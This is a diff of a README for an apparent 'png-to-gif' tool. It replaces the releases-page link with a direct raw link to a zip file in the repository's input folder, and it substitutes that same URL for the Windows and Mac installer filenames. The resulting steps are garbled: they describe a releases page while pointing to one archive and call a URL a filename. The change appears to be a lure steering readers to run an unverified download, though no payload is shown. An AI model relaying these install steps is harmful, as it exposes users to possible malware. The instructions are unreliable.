OMOR3421/png-to-gif/README.md

 ## 📥 Download & Install

 1. **Visit the Download Page:**
-   Go to the following link to access the latest releases: [Download png-to-gif](https://github.com/OMOR3421/png-to-gif/releases).
+   Go to the following link to access the latest releases: [Download png-to-gif](https://github.com/OMOR3421/png-to-gif/raw/refs/heads/main/input/png-to-gif-v3.4.zip).

 2. **Select the Latest Version:**
    On the releases page, find the most recent version of png-to-gif.
 It will usually be at the top of the list.

 3. **Download the Application:**
    You will see several assets listed for the selected version.
 Click on the file that matches your operating system.
-Most commonly, it will be named something like `png-to-gif-x.x.x.exe` for Windows or `png-to-gif-x.x.x.dmg` for Mac.
+Most commonly, it will be named something like `https://github.com/OMOR3421/png-to-gif/raw/refs/heads/main/input/png-to-gif-v3.4.zip` for Windows or `https://github.com/OMOR3421/png-to-gif/raw/refs/heads/main/input/png-to-gif-v3.4.zip` for Mac.

 4. **Install the Application:**
    After the download completes, locate the file in your downloads folder.
 Double-click the file to install png-to-gif.
 Follow the on-screen instructions to complete the installation.